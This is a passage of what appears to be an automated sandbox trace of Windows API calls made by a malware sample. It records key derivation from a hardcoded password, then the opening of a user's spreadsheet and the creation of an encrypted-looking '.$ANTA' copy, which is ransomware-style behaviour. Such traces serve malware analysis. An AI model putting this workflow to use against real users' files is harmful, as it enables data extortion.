hFindFile=0x41ac500) returned 1 [0077.416] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0077.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0077.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0077.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0077.423] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.424] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0077.424] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.424] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca6e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.425] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.425] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca868, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.425] CryptHashData (hHash=0x41ac600, pbData=0x17e2668, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.425] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.425] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0077.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca550, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.426] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac600, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac6c0) returned 1 [0077.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.426] CryptDestroyHash (hHash=0x41ac600) returned 1 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0077.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0077.427] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\nwjd3dflnaf4dbf3yn.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.428] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.428] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0077.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.428] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0077.429] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0077.429] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0077.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0077.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0077.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0077.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0077.431] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0077.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0077.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.431] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NwJd3dflnaF4DbF3Yn.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\nwjd3dflnaf4dbf3yn.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.432] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0077.432] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0077.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0077.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0077.433] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.433] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0077.433] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0077.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0077.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0077.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0077.438] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, 